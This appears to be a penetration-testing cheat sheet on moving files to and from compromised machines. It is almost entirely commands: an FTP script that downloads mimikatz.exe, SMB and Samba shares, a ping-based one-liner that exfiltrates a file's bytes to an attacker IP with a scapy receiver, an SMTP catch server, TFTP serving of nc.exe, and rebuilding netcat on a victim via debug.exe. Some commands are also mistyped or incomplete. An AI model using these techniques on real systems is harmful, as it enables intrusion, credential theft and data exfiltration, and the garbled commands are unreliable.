#Run the following script to configure the FTP server
groupadd ftpgroup
useradd -g ftpgroup -d /dev/null -s /etc ftpuser
pure-pwd useradd fusr -u ftpuser -d /ftphome
pure-pw mkdb
cd /etc/pure-ftpd/auth/
ln -s ../conf/PureDB 60pdb
mkdir -p /ftphome
chown -R ftpuser:ftpgroup /ftphome/
/etc/init.d/pure-ftpd restart
Windows client
#Work well with python. With pure-ftp use fusr:ftp
echo open 21 > ftp.txt
echo USER anonymous >> ftp.txt
echo anonymous >> ftp.txt
echo bin >> ftp.txt
echo GET mimikatz.exe >> ftp.txt
echo bye >> ftp.txt
ftp -n -v -s:ftp.txt
Kali as server
kali_op1> impacket-smbserver -smb2support kali `pwd` # Share current directory
kali_op2> smbserver.py -smb2support name /path/folder # Share a folder
#For new Win10 versions
impacket-smbserver -smb2support -user test -password test test `pwd`
Or create a smb share using samba:
apt-get install samba
mkdir /tmp/smb
chmod 777 /tmp/smb
#Add to the end of /etc/samba/smb.conf this:
comment = Samba on Ubuntu
path = /tmp/smb
read only = no
browsable = yes
guest ok = Yes
#Start samba
service smbd restart
CMD-Wind> \\\path\to\exe
CMD-Wind> net use z: \\\test /user:test test #For SMB using credentials
WindPS-1> New-PSDrive -Name "new_disk" -PSProvider "FileSystem" -Root "\\\kali"
WindPS-2> cd new_disk:
#In order to exfiltrate the content of a file via pings you can do:
xxd -p -c 4 /path/file/exfil | while read line; do ping -c 1 -p $line <IP attacker>; done
#This will 4bytes per ping packet (you could probablie increase this until 16)
from scapy.all import *
#This is ippsec receiver created in the HTB machine Mischief
def process_packet(pkt):
if pkt.haslayer(ICMP):
if pkt[ICMP].type == 0:
data = pkt[ICMP].load[-4:] #Read the 4bytes interesting
print(f"{data.decode('utf-8')}", flush=True, end="")
sniff(iface="tun0", prn=process_packet)
If you can send data to an SMTP server, you can create a SMTP to receive the data with python:
sudo python -m smtpd -n -c DebuggingServer :25
By default in XP and 2003 (in others it need to be explicitly added during installation)
In Kali, start TFTP server:
#I didn't get this options working and I prefer the python option
mkdir /tftp
atftpd --daemon --port 69 /tftp
cp /path/tp/nc.exe /tftp
This is a crazy technique that works on Windows 32 bit machines. Basically the idea is to use the debug.exe program. It is used to inspect binaries, like a debugger. But it can also rebuild them from hex. So the idea is that we take a binaries, like netcat. And then disassemble it into hex, paste it into a file on the compromised machine, and then assemble it with debug.exe.
Debug.exe can only assemble 64 kb. So we need to use files smaller than that. We can use upx to compress it even more. So let's do that:
upx -9 nc.exe
Now it only weights 29 kb. Perfect. So now let's disassemble it:
wine exe2bat.exe nc.exe nc.txt
Now we just copy-paste the text into our windows-shell. And it will automatically create a file called nc.exe